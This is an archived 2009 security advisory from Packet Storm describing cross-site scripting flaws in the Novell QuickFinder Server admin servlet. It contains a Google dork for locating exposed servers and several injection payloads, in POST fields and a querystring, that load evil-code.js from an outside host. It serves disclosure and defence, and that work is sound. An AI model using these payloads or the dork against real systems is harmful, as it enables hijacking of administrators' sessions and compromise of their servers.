exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Novell-QuickFinder Server XSS

Novell-QuickFinder Server XSS
Posted Feb 9, 2009
Authored by Ivan Sanchez | Site nullcode.com.ar

Novell-QuickFinder Server suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 35bb500e9e3fbd634f1928875171b9954e6d652c7bbffd5eb2c7f2b1eb7b5978

Novell-QuickFinder Server XSS

Change Mirror Download
                             NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================================================================+
+ Novell-QuickFinder Server //Cross-site scripting (XSS) Remote Java Execution Code +
+================================================================================================================================+


Author(s): Ivan Sanchez

http://www.novell.com/products/openenterpriseserver/quickfinder.html

Date: 10/02/2009


Overview
--------

If your company's Web site is like most, it's not lacking in information. While your site's visitors have access to massive amounts of data, they may benefit from a faster,
more efficient way to pinpoint what they're looking for: QuickFinder Server (formerly NetWare® Web Search) from Novell.

Unlike all-Web search engines, QuickFinder is targeted at the Enterprise. General Internet search engines index many Web sites and their component pages, but they either cannot or do not index all available content. Perhaps that's the reason more than 75 percent of Web-site visitors use site-specific search functionality when it's available to them. In fact, for many Web sites, the search-results page has more hits than does the home page.
Yet more than 50 percent of large Web sites (over 500,000 pages) and 70 percent of moderately sized Web sites (up to 5,000 pages) do not offer search functionality to their visitors.

"
Today I was checking a lot parameters,"POST" we have a lot of them to be exploited.
So I have posted some, but we have much more.
cheers !!! "

GOOGLE DORKS:
------------

Google Search: inurl:"/NSearch/AdminServlet"



Parameter Affected over http/https:
-----------------------------------




"add virtual server"

https://server:2200/qfsearch/AdminServlet?&req=displayaddsite

Post:
siteloc=%22%3E%3Cscript%20src=http://nullcode.com.ar/scripts/evil-code.js%3E%3C/script%3E

"Default"

Post:
https://server:2200/qfsearch/AdminServlet?site=globalsearchsite&req=generalproperties
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>

"services, synchronization"

Post:
https://server:2200/qfsearch/AdminServlet?&req=clusterserviceproperties
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>


Querystring:

https://server2200/qfsearch/AdminServlet?&req=global&adminurl="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>


Much more parameters have been affected.("print-list")



Remediation: Validate the Input.
------------





NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================================================================+
+ Novell-QuickFinder Server //Cross-site scripting (XSS) Remote Java Execution Code +
+================================================================================================================================+


Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close